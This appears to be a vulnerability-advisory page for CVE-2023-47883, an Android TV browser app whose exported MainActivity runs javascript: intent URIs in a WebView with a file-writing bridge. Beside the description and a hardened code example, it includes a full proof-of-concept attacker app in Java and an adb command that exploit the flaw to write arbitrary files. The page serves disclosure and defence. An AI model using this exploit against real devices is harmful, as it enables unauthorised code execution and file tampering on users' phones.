VYPR
Unrated severity · NVD Advisory · Published Dec 27, 2023 · Updated Aug 2, 2024

CVE-2023-47883

Description

The com.altamirano.fabricio.tvbrowser TV browser application through 4.5.1 for Android is vulnerable to JavaScript code execution via an explicit intent due to an exposed MainActivity.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

TVBrowser for Android 4.5.1 and earlier allows JavaScript code execution via an exported MainActivity. Because the activity is reachable by explicit intent, any other app installed on the same device can inject scripts into the browser's WebView and, through its JavaScript bridge, create arbitrary files.

Vulnerability

The TVBrowser application (com.altamirano.fabricio.tvbrowser) through version 4.5.1 exposes the MainActivity component, which is exported and can be invoked by third-party applications via explicit intents [2]. When a crafted URI containing JavaScript code is passed in the intent, it is loaded into the WebView, allowing arbitrary JavaScript execution [2]. Additionally, the WebView exposes JavaScript interfaces that can be abused for arbitrary file creation [2].

Exploitation

An attacker can launch the MainActivity by sending an explicit intent whose data URI carries a JavaScript payload. The payload can call exposed JavaScript interfaces, such as Android.getBase64FromBlobData, to write arbitrary files (e.g., text or image files) to the device's storage [2]. The attacking app needs no special permissions, and the victim does not have to interact with anything: the attacker's call to startActivity is enough.

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript code in the WebView context and create arbitrary files on the device. This can lead to data exfiltration, defacement, or further compromise of the application's data and functionality [2].

Mitigation

As of version 5.0, the vulnerability remains unpatched according to the advisory [2]. Users are advised to avoid using the application until a fix is released. No official patch or workaround has been provided.

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0 (no patches discovered yet)

Vulnerability mechanics

Root cause

"The exported MainActivity passes an attacker-controlled intent URI directly to a WebView without validation, enabling JavaScript code injection and arbitrary file creation via exposed JavaScript interfaces."

Attack vector

A malicious app installed on the same device sends an explicit `Intent` with `Intent.ACTION_VIEW` targeting the exported `MainActivity` component (an explicit intent names the component directly, so no intent-filter matching is involved). The intent's data URI is crafted as a `javascript:` URL containing arbitrary JavaScript code. When `MainActivity` receives this intent, the WebView executes the JavaScript, which can invoke exposed JavaScript interfaces (e.g., `Android.getBase64FromBlobData`) to create or overwrite files in the Downloads folder [ref_id=1]. The attacking app needs no special permissions, and no user interaction beyond its call to `startActivity` is required.

Affected code

The exported `com.altamirano.fabricio.tvbrowser.MainActivity` activity is the vulnerable component. The activity's WebView exposes JavaScript interfaces such as `Android.getBase64FromBlobData`, and the activity accepts an explicit `Intent` whose data URI is passed directly to the WebView [ref_id=1].

What the fix does

The advisory states that as of version 5.0 the vulnerability remains unpatched [ref_id=1]. The recommended remediation is to ensure activities are not unnecessarily exported, apply appropriate intent filters and permissions, and restrict JavaScript interfaces exposed by the WebView so they do not expose sensitive functionality to running JavaScript [ref_id=1]. No patch diff is available.
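The two sides of the root cause, as an added example written for this page (it is not the TVBrowser source, which the advisory does not reproduce): the intent-handling pattern the root-cause quote describes, beside a hardened version that applies the remediation listed above. The class layout, `safeUrlFromIntent`, `SafeBridge` and the `FileBridge` name are hypothetical; only the component name, the `Android` bridge name and `getBase64FromBlobData` come from the advisory.

```java
// Added example, not TVBrowser code. Shows the vulnerable pattern (in comments) and a
// hardened replacement for an exported browser activity that receives ACTION_VIEW intents.
package com.example.browser;   // hypothetical package

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;

public class MainActivity extends Activity {

    // Schemes an external intent is allowed to make the WebView navigate to.
    // Everything else (javascript:, file:, content:, intent:, data:) is dropped.
    private static final String[] ALLOWED_SCHEMES = {"http", "https"};

    private WebView webView;

    /** Bridge that exposes nothing sensitive: no file system, no storage writes. */
    static final class SafeBridge {
        @JavascriptInterface               // only annotated methods are reachable from JS (API 17+)
        public String appVersion() { return "5.0"; }   // constructed value for the example
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        webView = new WebView(this);
        setContentView(webView);
        webView.getSettings().setJavaScriptEnabled(true);

        // VULNERABLE pattern described in the root cause (kept here as comments only):
        //   webView.addJavascriptInterface(new FileBridge(), "Android"); // exposes getBase64FromBlobData
        //   webView.loadUrl(getIntent().getDataString());                // runs a javascript: URI from any app
        //
        // Hardened: a bridge without file-writing methods, and only http(s) data URIs are loaded.
        webView.addJavascriptInterface(new SafeBridge(), "Android");
        handleIntent(getIntent());
    }

    @Override
    protected void onNewIntent(Intent intent) {
        super.onNewIntent(intent);       // singleTop/re-delivered intents take the same path
        handleIntent(intent);
    }

    private void handleIntent(Intent intent) {
        String url = safeUrlFromIntent(intent);
        if (url != null) {
            webView.loadUrl(url);
        }
        // A rejected intent is simply ignored; the activity shows its default page.
    }

    /**
     * Returns the intent's data URI as a string if it is an ACTION_VIEW of an http(s) URL,
     * otherwise null. Scheme comparison is case-insensitive because Uri.getScheme() is not
     * normalised ("JAVASCRIPT:" must be rejected as firmly as "javascript:").
     */
    static String safeUrlFromIntent(Intent intent) {
        if (intent == null || !Intent.ACTION_VIEW.equals(intent.getAction())) return null;
        Uri data = intent.getData();
        if (data == null || data.getScheme() == null) return null;
        for (String ok : ALLOWED_SCHEMES) {
            if (ok.equalsIgnoreCase(data.getScheme())) return data.toString();
        }
        return null;
    }
}
```

Two caveats worth keeping in mind. A launcher activity has to stay exported (and on API 31+ `android:exported` must be declared explicitly for any component with an intent filter), so for a browser's main activity the real fix is validating the incoming data, not flipping `android:exported="false"`; that attribute is the right answer for the other activities an app does not need to expose. And scheme filtering alone does not make a file-writing bridge safe: once attached, `window.Android` is callable by any http(s) page the user lands on, so a bridge like the advisory's `getBase64FromBlobData` has to be removed or restricted to trusted origins rather than merely shielded from `javascript:` intents.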

Preconditions

  • config: The target device must have the com.altamirano.fabricio.tvbrowser app installed (version 4.5.1 or earlier)
  • network: The attacker must be able to send an explicit Intent to the exported MainActivity, which in practice means a malicious Android app installed on the same device; explicit intents cannot be delivered over the network
  • auth: No permissions and no user interaction are required; the victim only needs the app installed alongside the malicious app

Reproduction

The reference write-up provides a proof-of-concept. A malicious Android app constructs an `Intent` with `Intent.ACTION_VIEW`, sets the component to `com.altamirano.fabricio.tvbrowser/.MainActivity`, and sets the data URI to a `javascript:` URL that calls `window.Android.getBase64FromBlobData` with attacker-controlled base64 data and a filename. Calling `startActivity(intent)` launches the TV browser's `MainActivity`, which executes the JavaScript and creates the file [ref_id=1].
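The intent construction described in the attack vector and in the reproduction steps above, written out as an added example for this page; it is not the reference write-up's proof-of-concept. The package and class of the target and the `window.Android.getBase64FromBlobData` bridge method come from the advisory; the bridge's argument order (base64 data first, then a file name) and the `PocActivity` name are assumptions, since the page does not reproduce the method's signature.

```java
// Added example, not the reference PoC. A hypothetical app that launches the TV browser's
// exported MainActivity with a javascript: data URI, as the advisory describes.
package com.example.poc;   // hypothetical attacker package

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Base64;

import java.nio.charset.StandardCharsets;

public class PocActivity extends Activity {

    // Exported target named in the advisory.
    static final String TARGET_PKG = "com.altamirano.fabricio.tvbrowser";
    static final String TARGET_CLS = "com.altamirano.fabricio.tvbrowser.MainActivity";

    /**
     * Builds the javascript: URL. The script calls the bridge the advisory names;
     * the (base64, fileName) argument order is an assumption.
     */
    static String buildPayloadUrl(String fileContents, String fileName) {
        String b64 = Base64.encodeToString(
                fileContents.getBytes(StandardCharsets.UTF_8), Base64.NO_WRAP);
        return "javascript:window.Android.getBase64FromBlobData('" + b64 + "','" + fileName + "')";
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // Constructed, harmless file body; the file name is attacker-chosen too.
        String url = buildPayloadUrl("written through the exposed bridge", "cve-2023-47883-poc.txt");

        // Explicit intent: the component is named directly, so the target's intent filters
        // are never consulted. Uri.parse() keeps the string as-is, so the WebView receives
        // the javascript: URL unchanged.
        Intent intent = new Intent(Intent.ACTION_VIEW, Uri.parse(url));
        intent.setComponent(new ComponentName(TARGET_PKG, TARGET_CLS));
        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);

        startActivity(intent);   // MainActivity loads the URL; the bridge writes the file
        finish();
    }
}
```

The same launch can be driven from a shell for triage (`adb shell am start -n com.altamirano.fabricio.tvbrowser/.MainActivity -a android.intent.action.VIEW -d 'javascript:...'`), which is a quick way to confirm whether a build still loads `javascript:` intent data before writing any app code. Note that the activity being exported is the visible symptom; the file write itself depends on the bridge method that the advisory names, so a fixed build must be checked for both.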

Generated on May 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 3
